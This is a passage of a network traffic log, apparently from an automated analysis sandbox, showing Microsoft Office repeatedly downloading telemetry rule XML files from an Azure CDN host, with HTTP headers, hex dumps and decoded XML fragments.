                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:45 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:45 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1364
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE1223606"
                                                                                                                                                                                  x-ms-request-id: 45806a8e-701e-003e-807c-3b79b3000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134745Z-174c587ffdfmrvb9hC1TEBtn3800000003300000000039uy
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:45 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  111192.168.2.44990313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:47 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:47 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1397
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE7262739"
                                                                                                                                                                                  x-ms-request-id: 9aa8fa60-a01e-001e-5131-3c49ef000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134747Z-15b8b599d882l6clhC1TEBxd5c000000030g000000001cr7
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:47 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  112192.168.2.44990413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:47 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:47 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1360
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                  x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134747Z-178bfbc474btrnf9hC1NYCb80g00000004r00000000086h7
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:48 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  113192.168.2.44990513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:47 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:47 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1403
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                  x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134747Z-174c587ffdftv9hphC1TEBm29w00000002x000000000d1pg
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:48 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  114192.168.2.44990613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:47 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:47 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1366
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                  x-ms-request-id: a0a34a76-601e-0050-3b16-3d2c9c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134747Z-178bfbc474b9fdhphC1NYCac0n00000004g00000000072f1
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:48 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  115192.168.2.44990713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:47 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:47 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1397
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                  x-ms-request-id: af8656a8-801e-00a0-672a-3c2196000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134747Z-178bfbc474bp8mkvhC1NYCzqnn00000004f0000000002ee2
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:48 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  116192.168.2.44990813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:49 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:49 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1360
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                  x-ms-request-id: e88bdfa1-301e-003f-630e-3d266f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134749Z-178bfbc474bpnd5vhC1NYC4vr400000004kg0000000066dd
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:49 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  117192.168.2.44990913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:49 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:50 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1427
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                  x-ms-request-id: 4d8c69aa-d01e-0028-1552-3c7896000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134750Z-15b8b599d882hxlwhC1TEBfa5w00000002y0000000007hcu
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:50 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  118192.168.2.44991013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:49 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:50 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:50 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1390
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE3002601"
                                                                                                                                                                                  x-ms-request-id: 74bdb417-d01e-00ad-341a-3de942000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134750Z-178bfbc474bq2pr7hC1NYCkfgg00000004p000000000awxs
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:50 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  119192.168.2.44991113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:49 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:50 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1401
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                  x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134750Z-174c587ffdfdwxdvhC1TEB1c4n00000002yg000000008sv8
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
